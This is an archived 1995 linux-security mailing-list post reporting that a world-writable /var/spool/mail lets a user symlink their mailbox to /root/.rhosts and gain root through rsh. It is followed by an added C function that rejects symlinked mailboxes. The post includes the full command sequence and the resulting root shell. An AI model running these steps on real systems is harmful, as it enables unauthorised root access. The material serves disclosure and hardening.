[429] in linux-security and linux-alert archive
/var/spool/mail permissions
daemon@ATHENA.MIT.EDU (owner-linux-security@tarsier.cv.nr)
Thu Oct 26 15:58:27 1995
From: owner-linux-security@tarsier.cv.nrao.edu
To: linux-security@tarsier.cv.nrao.edu
Date: Wed, 25 Oct 1995 00:18:32 +0000 (GMT)
Cc: cs6171@scitsc
Hello,
People on comp.security.unix have suggested giving
/var/spool/mail drwxrwxrwt permissions on linux. On my system I
know that this is a BAD idea, and I told them so.
My system (Slackware 2.0) runs Smail3.1.28.1 since I have not altered the
mail setup since I have installed it. Now if I change /var/spool/mail to
drwxrwxrwt a user can delete his mail file and replace it with a symbolic
link to any file, mail is then written to this file as root (amusingly the
ownership of the actual symbolic link is then changed).
To use the typical example of root's .rhosts:
arny> ls -ld /var/spool/mail
drwxrwxrwt 2 root mail 1024 Oct 24 21:37 /var/spool/mail/
arny> cp /var/spool/mail/arny ~/myoldmailfile
arny> rm /var/spool/mail/arny
arny> ln -s /root/.rhosts /var/spool/mail/arny
arny> echo localhost arny | mail arny
arny> rsh localhost -l root 'sh -i'
bash# id
id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(shadow)
bash#
I have yet to post the above details, but just this evening I
have received mail from five people asking for them.
The thing is I'm not a great linux expert, although I do use it
every day. For a start I don't know the answers to the following
questions:
a) how many linux systems does this affect?
b) has this problem to some extent been fixed in the
latest distributions of linux?
c) is this problem old news, has it been discussed
before, how many people know about it?
d) should I post the above 'exploit' details to
comp.security.unix, since some people seem to need
little excuse to criticise linux, which in this case
would be unfair? (Having said that if I keep getting
mail I may (almost) have to post it).
Personally I think slackware really does have the right idea with:
drwxrwxr-x 2 root mail 1024 Oct 24 22:44 /var/spool/mail/
and avoids a lot of problems such as race conditions etc. The
only problem for me is that root is effectively trusting group
mail, which IMO is not a very good idea, although plenty of
other operating systems trust root to all sorts.
I don't subscribe to this mailing list, so please cc all replies
to:
cs6171@scitsc.wlv.ac.uk
Alternatively help me out a little here and post to
comp.security.unix instead.
Thanks,
Arny - cs6171@scitsc.wlv.ac.uk
--
<A HREF="http://scitsc.wlv.ac.uk/~cs6171/hack/index.html">unix/net/hack page</A>
<A HREF="http://scitsc.wlv.ac.uk/~cs6171/home.html">Arny's Home Page</A>
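
A delivery-side check that refuses the kind of symlinked mailbox described in the message above, as an added example (not part of the original post and not Smail's code). The helper name open_mailbox is hypothetical; it assumes a Linux kernel with O_NOFOLLOW and covers only a mailbox that already exists.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open an existing mailbox for append on behalf of `owner` (hypothetical helper).
 * Returns a descriptor, or -1 with errno set when the file is not trustworthy. */
int open_mailbox(const char *path, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW: a symlink as the last path component fails with ELOOP.
     * O_NONBLOCK: a FIFO planted in the spool cannot stall delivery. */
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;
    /* Check the descriptor, not the name: the name can be swapped after open. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 ||          /* hard link to some other file */
        st.st_uid != owner) {        /* not the recipient's own file */
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed demo: a real mailbox and a symlinked one in a scratch directory. */
int main(void)
{
    char dir[] = "/tmp/spoolXXXXXX", box[128], lnk[128];
    if (!mkdtemp(dir)) return 1;
    snprintf(box, sizeof box, "%s/alice", dir);
    snprintf(lnk, sizeof lnk, "%s/bob", dir);
    close(open(box, O_CREAT | O_WRONLY, 0600));
    if (symlink(box, lnk) != 0) return 1;
    int ok = open_mailbox(box, getuid());
    int bad = open_mailbox(lnk, getuid());
    int err = errno;                 /* save before printf can touch errno */
    printf("regular file: %s\n", ok >= 0 ? "accepted" : "refused");
    printf("symlink:      %s (%s)\n", bad >= 0 ? "accepted" : "refused", strerror(err));
    if (ok >= 0) close(ok);
    unlink(lnk); unlink(box); rmdir(dir);
    return 0;
}
```

The checks run on the opened descriptor, so they still hold if the directory entry is replaced after the open call.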